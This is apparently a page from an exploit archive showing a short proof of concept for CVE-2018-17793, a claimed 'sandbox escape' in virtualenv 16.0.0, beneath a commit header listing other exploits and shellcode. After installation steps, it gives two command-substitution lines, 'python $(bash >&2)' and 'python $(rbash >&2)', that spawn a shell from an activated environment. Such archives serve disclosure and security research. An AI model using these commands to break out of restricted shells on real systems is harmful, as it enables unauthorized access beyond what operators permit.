89530e070b
5 changes to exploits/shellcodes virtualenv 16.0.0 - Sandbox Escape NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) LayerBB Forum 1.1.1 - 'search_query' SQL Injection Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)
19 lines
No EOL
573 B
Text
19 lines
No EOL
573 B
Text
# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
|
|
# Date: 2018-10-02
|
|
# Exploit Author: vr_system
|
|
# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
|
|
# Software Link: https://virtualenv.pypa.io/en/stable/
|
|
# Version: 16.0.0
|
|
# Tested on: kali linux
|
|
# CVE : CVE-2018-17793
|
|
|
|
# 1 Install
|
|
# root@kali:~#pip install virtualenv
|
|
# root@kali:~#virtualenv test_env
|
|
# root@kali:~#cd test_env/
|
|
# root@kali:~/test_env#source ./bin/activate
|
|
|
|
# 2 Sandbox escape
|
|
|
|
(test_env) root@kali:~/test_env#python $(bash >&2)
|
|
(test_env) root@kali:~/test_env#python $(rbash >&2) |